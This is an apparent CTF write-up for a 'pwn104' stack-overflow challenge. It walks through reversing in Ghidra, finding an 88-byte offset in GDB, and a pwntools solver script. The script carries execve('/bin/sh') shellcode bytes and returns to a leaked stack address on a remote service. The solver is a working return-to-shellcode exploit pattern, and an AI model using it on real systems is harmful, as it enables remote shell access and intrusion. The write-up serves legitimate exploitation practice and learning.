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File metadata and controls

78 lines (50 loc) · 2.16 KB

hi all ✍️📘

This is my experience write up about PWN material (return to shellcode). I try to asnwer challenges after Learning about the shellcode, I'm not good at it, but here I want to give a little knowledge that I can for help you all who is in a clueless position like I was before.


What is Problem

in the challange you should to return flow of binary to shellcode

Analysis File

So this file is x64 and , you can see the protection file :


Let's Start Reverse Using Ghidra


You can see, the leak address has been given by the system, so i just found padding, and return to leak address And then, you can see, a function read, it's ask user input, and this is a vuln of the chall too.


shellcode + padding + return to shellcode

Debuging using GDB-GEF

let's see if i break point at printf call


after this let's run the program and using ni (next instruction until a read func), after this input to much character, hm i using char A in this challanges, no probles if you can other char.


after this, let's check offset and return address for calculate padding.


the start of input address offset is 0x7fffffffdf60 and return address is 0x7fffffffdfb8

after i calculate this padding, i found the padding is 88


And after this i create solver


#!/usr/bin/env python3
from pwn import *

#p = process('./pwn104.pwn104')
p = remote('', 9004)
sellcode = b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
payload = sellcode
payload += b'A' * ( 88 - len(sellcode))
p.recvuntil(b'you at ')
address_leak = p.recvline()
address = int(address_leak.strip(b'\n'), 16)
print(f"Address: 0x{address:x}")
payload += p64(address)
#payload += p64(address)


And after run this solver i got result

Quotes ✍️

"The only people spend a much time is a got a shell"